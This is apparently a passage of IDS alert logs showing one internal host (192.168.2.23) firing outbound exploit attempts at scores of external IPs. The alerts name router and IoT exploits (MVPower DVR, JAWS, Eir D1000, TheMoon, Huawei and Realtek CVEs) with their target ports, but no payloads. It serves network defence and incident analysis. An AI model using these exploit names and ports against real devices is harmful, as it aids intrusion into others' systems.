ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 102.134.57.197

Timestamp:	03/18/24-10:00:03.802980
SID:	2025883
Source Port:	59618
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 124.250.115.203

Timestamp:	03/18/24-09:58:41.380741
SID:	2030092
Source Port:	40506
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.43.199.212

Timestamp:	03/18/24-10:00:21.629471
SID:	2023548
Source Port:	36246
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.140.239.121

Timestamp:	03/18/24-09:58:43.269543
SID:	2030092
Source Port:	59332
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 3.226.29.166

Timestamp:	03/18/24-10:00:02.869866
SID:	2025576
Source Port:	50600
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.236.132.177

Timestamp:	03/18/24-09:57:03.927137
SID:	2025576
Source Port:	52514
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 195.245.82.70

Timestamp:	03/18/24-09:58:20.420942
SID:	2030092
Source Port:	54848
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.57.48.112

Timestamp:	03/18/24-09:58:54.757606
SID:	2018132
Source Port:	41268
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 191.101.104.106

Timestamp:	03/18/24-10:00:20.321008
SID:	2030092
Source Port:	60506
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 64.226.94.5

Timestamp:	03/18/24-09:59:42.121375
SID:	2025883
Source Port:	33704
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 185.232.85.45

Timestamp:	03/18/24-09:59:06.624001
SID:	2025883
Source Port:	55012
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.240.116.87

Timestamp:	03/18/24-09:59:09.391775
SID:	2023548
Source Port:	43742
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 191.96.112.152

Timestamp:	03/18/24-10:00:03.658389
SID:	2025883
Source Port:	60832
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.56.28.126

Timestamp:	03/18/24-09:59:58.314764
SID:	2835222
Source Port:	49836
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 90.84.187.21

Timestamp:	03/18/24-10:00:14.782799
SID:	2025883
Source Port:	36726
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.70.42.188

Timestamp:	03/18/24-10:00:10.106003
SID:	2025883
Source Port:	33386
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.196.111.160

Timestamp:	03/18/24-09:58:44.159411
SID:	2025576
Source Port:	54218
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 34.203.199.230

Timestamp:	03/18/24-09:59:51.919873
SID:	2025883
Source Port:	35572
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 124.87.30.108

Timestamp:	03/18/24-09:56:57.745355
SID:	2030092
Source Port:	39664
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 47.254.206.108

Timestamp:	03/18/24-09:58:15.046950
SID:	2030092
Source Port:	60230
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 203.142.35.108

Timestamp:	03/18/24-09:58:58.445949
SID:	2025576
Source Port:	43530
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 145.82.99.110

Timestamp:	03/18/24-09:58:32.119721
SID:	2023548
Source Port:	41134
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 168.188.213.21

Timestamp:	03/18/24-09:59:31.410658
SID:	2030092
Source Port:	44040
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.7.67.19

Timestamp:	03/18/24-09:59:15.233670
SID:	2030092
Source Port:	47108
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.247.16.221

Timestamp:	03/18/24-09:57:00.596936
SID:	2023548
Source Port:	48036
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 137.184.115.152

Timestamp:	03/18/24-09:57:00.463132
SID:	2025576
Source Port:	58586
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 52.217.196.137

Timestamp:	03/18/24-09:59:34.547539
SID:	2025576
Source Port:	35194
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.167.74.32

Timestamp:	03/18/24-09:58:53.061550
SID:	2023548
Source Port:	40668
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 196.51.90.124

Timestamp:	03/18/24-09:59:34.175201
SID:	2030092
Source Port:	57494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.171.97.173

Timestamp:	03/18/24-09:59:30.633642
SID:	2023548
Source Port:	59080
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 193.201.190.239

Timestamp:	03/18/24-09:59:43.966772
SID:	2025883
Source Port:	52276
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 193.33.133.175

Timestamp:	03/18/24-09:58:44.320388
SID:	2025883
Source Port:	54034
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 133.114.112.241

Timestamp:	03/18/24-09:58:29.441598
SID:	2023548
Source Port:	51406
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 116.89.2.122

Timestamp:	03/18/24-09:59:16.065379
SID:	2023548
Source Port:	51386
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.192.237

Timestamp:	03/18/24-09:58:21.524240
SID:	2018132
Source Port:	42730
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 218.156.94.48

Timestamp:	03/18/24-10:00:11.110302
SID:	2025883
Source Port:	55272
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.232.71.74

Timestamp:	03/18/24-09:58:31.993984
SID:	2023548
Source Port:	49338
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 142.171.28.226

Timestamp:	03/18/24-10:00:15.242082
SID:	2025576
Source Port:	41250
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 52.223.20.244

Timestamp:	03/18/24-09:58:29.159329
SID:	2023548
Source Port:	36340
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 180.9.7.9

Timestamp:	03/18/24-09:59:32.002803
SID:	2027339
Source Port:	48018
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.217.190

Timestamp:	03/18/24-09:58:42.167223
SID:	2018132
Source Port:	43470
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 85.128.222.86

Timestamp:	03/18/24-09:59:00.019996
SID:	2030092
Source Port:	51844
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 148.0.172.184

Timestamp:	03/18/24-09:59:01.690341
SID:	2023548
Source Port:	55728
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.171.184.202

Timestamp:	03/18/24-09:59:47.618856
SID:	2023548
Source Port:	45450
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.74.136.35

Timestamp:	03/18/24-09:58:54.429122
SID:	2023548
Source Port:	50256
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.224.131.137

Timestamp:	03/18/24-09:59:01.794880
SID:	2023548
Source Port:	41918
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.194.79.58

Timestamp:	03/18/24-09:59:49.629966
SID:	2025576
Source Port:	50166
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.34.87.46

Timestamp:	03/18/24-10:00:09.213773
SID:	2023548
Source Port:	46292
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.33.139.210

Timestamp:	03/18/24-10:00:09.821316
SID:	2023548
Source Port:	38028
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 194.9.56.89

Timestamp:	03/18/24-09:59:06.968807
SID:	2025576
Source Port:	48366
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.234.219.78

Timestamp:	03/18/24-09:59:46.256051
SID:	2023548
Source Port:	45738
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 94.123.52.242

Timestamp:	03/18/24-09:58:51.187912
SID:	2030092
Source Port:	60302
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.83.155.21

Timestamp:	03/18/24-09:58:52.603536
SID:	2025576
Source Port:	35560
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 89.203.30.67

Timestamp:	03/18/24-09:58:57.685314
SID:	2030092
Source Port:	41590
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.225.88.98

Timestamp:	03/18/24-09:58:17.986189
SID:	2023548
Source Port:	45278
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.210.173.21

Timestamp:	03/18/24-09:58:41.243097
SID:	2023548
Source Port:	55548
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.61.180.26

Timestamp:	03/18/24-09:59:50.425692
SID:	2023548
Source Port:	46486
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 2.18.161.149

Timestamp:	03/18/24-09:59:41.593627
SID:	2025883
Source Port:	45642
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 152.70.246.154

Timestamp:	03/18/24-09:57:00.100876
SID:	2025883
Source Port:	32846
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 203.56.69.38

Timestamp:	03/18/24-09:58:36.792782
SID:	2025576
Source Port:	50236
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 102.223.127.78

Timestamp:	03/18/24-09:57:03.678208
SID:	2025576
Source Port:	52898
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 13.249.76.100

Timestamp:	03/18/24-09:59:39.896966
SID:	2025576
Source Port:	51092
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.255.196.63

Timestamp:	03/18/24-09:59:16.320895
SID:	2023548
Source Port:	55330
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 67.175.7.145

Timestamp:	03/18/24-09:59:54.008512
SID:	2030092
Source Port:	36326
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.132.34.199

Timestamp:	03/18/24-10:00:01.817843
SID:	2023548
Source Port:	58182
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 142.132.177.190

Timestamp:	03/18/24-09:59:43.110614
SID:	2025576
Source Port:	37506
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.19.187.114

Timestamp:	03/18/24-09:59:10.392752
SID:	2025883
Source Port:	38324
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 184.183.79.73

Timestamp:	03/18/24-09:57:07.751708
SID:	2018132
Source Port:	52362
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 142.198.96.161

Timestamp:	03/18/24-09:59:19.235033
SID:	2025883
Source Port:	36538
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 20.229.55.177

Timestamp:	03/18/24-09:58:26.410213
SID:	2025576
Source Port:	32994
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 129.28.195.154

Timestamp:	03/18/24-09:59:06.409171
SID:	2025576
Source Port:	33688
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 156.254.102.201

Timestamp:	03/18/24-09:58:41.454519
SID:	2023548
Source Port:	40308
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 148.68.211.116

Timestamp:	03/18/24-09:59:34.452982
SID:	2025576
Source Port:	52696
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 129.208.96.147

Timestamp:	03/18/24-09:59:31.685471
SID:	2023548
Source Port:	33954
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 86.107.124.239

Timestamp:	03/18/24-09:59:38.057040
SID:	2025883
Source Port:	34168
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.115.99.172

Timestamp:	03/18/24-09:59:36.576934
SID:	2023548
Source Port:	57196
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 39.25.64.67

Timestamp:	03/18/24-09:59:37.572195
SID:	2023548
Source Port:	49152
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.29.246.133

Timestamp:	03/18/24-10:00:02.617420
SID:	2025883
Source Port:	52840
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.177.237

Timestamp:	03/18/24-09:58:49.490751
SID:	2018132
Source Port:	56284
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 219.69.7.15

Timestamp:	03/18/24-09:59:10.309379
SID:	2023548
Source Port:	47320
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 45.33.38.47

Timestamp:	03/18/24-09:59:43.939815
SID:	2030092
Source Port:	35792
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 103.19.250.149

Timestamp:	03/18/24-09:58:16.671692
SID:	2025883
Source Port:	58466
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 74.48.182.67

Timestamp:	03/18/24-09:59:49.053414
SID:	2025883
Source Port:	35338
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 184.24.62.8

Timestamp:	03/18/24-09:58:16.192794
SID:	2030092
Source Port:	51548
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 113.42.117.235

Timestamp:	03/18/24-09:59:33.372692
SID:	2023548
Source Port:	59224
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 166.88.203.133

Timestamp:	03/18/24-10:00:10.761917
SID:	2025576
Source Port:	46260
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 199.30.127.193

Timestamp:	03/18/24-09:59:14.401561
SID:	2023548
Source Port:	52626
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 148.0.172.184

Timestamp:	03/18/24-09:59:01.545239
SID:	2023548
Source Port:	55698
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 193.219.97.239

Timestamp:	03/18/24-10:00:16.534548
SID:	2025576
Source Port:	55528
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.93.55.186

Timestamp:	03/18/24-09:58:18.551685
SID:	2023548
Source Port:	59884
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.38.156.205

Timestamp:	03/18/24-09:58:59.224249
SID:	2030092
Source Port:	49154
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.195.120.252

Timestamp:	03/18/24-09:59:24.443503
SID:	2023548
Source Port:	55454
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 210.241.78.55

Timestamp:	03/18/24-09:58:30.972483
SID:	2030092
Source Port:	37392
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 211.200.75.155

Timestamp:	03/18/24-09:59:13.907598
SID:	2025576
Source Port:	40680
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 54.236.148.44

Timestamp:	03/18/24-09:57:05.716903
SID:	2025883
Source Port:	43630
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 182.78.200.84

Timestamp:	03/18/24-09:58:47.030155
SID:	2025883
Source Port:	58258
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.201.158.67

Timestamp:	03/18/24-10:00:05.382771
SID:	2025576
Source Port:	33920
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 206.189.8.131

Timestamp:	03/18/24-09:59:22.358021
SID:	2025883
Source Port:	48992
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 59.47.238.253

Timestamp:	03/18/24-09:59:26.421057
SID:	2025576
Source Port:	52302
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 91.92.231.22

Timestamp:	03/18/24-09:58:16.196160
SID:	2025576
Source Port:	58962
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.130.22

Timestamp:	03/18/24-09:58:29.160079
SID:	2018132
Source Port:	42908
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.166.20.1

Timestamp:	03/18/24-09:59:06.968848
SID:	2025576
Source Port:	36980
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 108.128.117.78

Timestamp:	03/18/24-10:00:18.319783
SID:	2025883
Source Port:	38752
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.75.140.67

Timestamp:	03/18/24-09:58:16.494308
SID:	2023548
Source Port:	47236
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 149.56.42.88

Timestamp:	03/18/24-09:58:19.201279
SID:	2030092
Source Port:	37050
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.133.243.84

Timestamp:	03/18/24-10:00:16.174215
SID:	2023548
Source Port:	53854
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.38.50

Timestamp:	03/18/24-09:58:43.188127
SID:	2018132
Source Port:	51672
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.25.45

Timestamp:	03/18/24-09:59:39.445228
SID:	2018132
Source Port:	50876
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 45.235.186.141

Timestamp:	03/18/24-09:58:15.562980
SID:	2025883
Source Port:	43748
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 58.214.18.227

Timestamp:	03/18/24-09:58:20.648338
SID:	2025883
Source Port:	40678
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.123.66.142

Timestamp:	03/18/24-09:59:00.607911
SID:	2023548
Source Port:	59240
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.190.223.180

